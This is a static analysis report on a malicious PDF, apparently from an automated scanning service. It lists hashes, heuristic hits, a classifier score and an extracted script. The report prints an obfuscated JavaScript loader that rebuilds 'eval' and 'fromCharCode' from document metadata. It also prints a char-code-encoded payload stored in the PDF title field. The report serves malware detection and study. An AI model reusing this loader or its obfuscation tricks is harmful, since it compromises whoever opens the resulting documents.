Malicious PDF — malware analysis report

Static analysis result for SHA-256 3de239bb6a2155cd…

MALICIOUS

PDF

21.2 KB Created: 2010-11-23 54:61:00 Authoring application: String.fromCharCode First seen: 2026-05-07
MD5: 1a8acce3e4cb290203f88aaf609b1f11 SHA-1: b32dfc50e2d9bb1053e6e6ec99a6721a86ef48c2 SHA-256: 3de239bb6a2155cd310c2e0bfc05d2d0f0503cc644f846baba7ece8b6f084189
114 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including 'PDF_JAVASCRIPT' and 'PDF_JS'. The ML classifier strongly flags this PDF as malicious. The embedded JavaScript, found in 'javascript_obj0001_000.js', is likely intended to perform malicious actions upon opening the document, such as downloading a second-stage payload. The presence of 'String.fromCharCode' further suggests obfuscation techniques common in malicious JavaScript.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    /Title (10lkf118lkf97lkf114lkf32lkf98lkf106lkf115lkf103lkf61lkf34lkf37lkf117lkf57lkf48lkf57lkf48lkf37lkf117lkf57lkf48lkf57lkf48lkf37lkf117lkf49lkf54lkf69lkf66lkf37lkf117lkf70lkf70lkf66lkf57lkf37lkf117lkf48lkf48lkf48lkf54lkf37lkf117lkf56lkf66lkf48lkf48lkf37lkf117lkf50lkf52lkf51lkf52lkf37lkf117lkf70lkf55lkf56lkf57lkf37lkf117lkf51lkf69lkf56lkf48lkf37lkf117lkf55lkf52lkf69lkf57lkf37lkf117lkf65lkf67lkf48lkf54lkf37lkf117lkf54lkf65lkf51lkf52lkf37lkf117lkf69lkf50lkf65lkf65lkf37lkf117lkf67lkf51lkf70lkf65l …
    /Producer (String.fromCharCode)
    /Subject (ev2011)
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0xA 593 bytes
SHA-256: d56120de8d41ad4678aa89fbe030cd7c9e0dac020c8da1c1d173b034860e5925
Preview script
First 1,000 lines of the extracted script
try {

var d=Function;
var date = new Date();
var q=date.getFullYear();
var uhvxc = "replac" + "e";
var dsaal='ald', sdhi='id', dsaaod='ods';
al=dsaal.substr(0,2);
fdsor=sdhi.substr(0,2);
od=dsaaod.substr(0,2);
b='';
e="." + "tooo"[1-1] + "it";
e+="le";
d('sfd','j=thi' + 's'+e)();
d('lh','k='+'this'+'.subject')();
var g=k.replace(q, al);
d('dasda','l='+'this.'+g)();

h='pr20' + new String(11);
h+='uceras'.substr(0,4);

h=l('h.replace(q,od)');
d('ads','i='+'this.'+h)();


m=l(i);


j=j.split("lkf");
n = l(j)


for(i = 0; i < n.length; i++) {

o = n[i];
b+=m(o);
}

l(b); 

}catch(e){}